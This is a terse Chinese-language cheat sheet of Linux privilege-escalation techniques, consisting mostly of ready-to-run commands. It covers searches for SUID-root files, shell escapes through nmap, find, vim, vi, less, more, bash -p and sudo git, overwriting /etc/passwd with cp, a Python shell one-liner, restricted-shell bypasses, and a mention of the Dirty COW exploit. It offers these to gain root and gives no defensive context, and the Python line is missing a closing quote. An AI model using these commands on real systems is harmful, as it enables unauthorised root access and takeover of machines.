内核提权(脏牛提权)
通过漏洞脚本识别风险漏洞,可借助msf自带漏洞库利用
SUID提权
部分文件会有rws权限统称为suid文件(执行文件时会以root权限执行)
若没有可赋权
chmod u+s 文件名
查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
SUID可以用来提权的文件
Nmap
Vim
find
Bash
More
Less
Nano
cp
如:
结尾是nmap
nmap --interactive
!sh
结尾是find
touch ttt//创建一个文件
find ttt -exec whoami \; //whoami是执行的命令,可以更改
结尾时vim
vim.tiny //按esc
:set shell=/bin/sh
:shell
结尾是bash
bash -p
bash-3.2# id
结尾是less和more时
less /etc/passwd
!/bin/sh
结尾是cp时
cp password /etc/passwd
python提权
python -c "import os;os.system('/bin/bash')
vi提权
vi flag3.txt //创建文件
:set shell=/bin/sh //文件里输入并保存
:shell
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin //输完后执行我们想要的命令
git提权
sudo git help config
!/bin/bash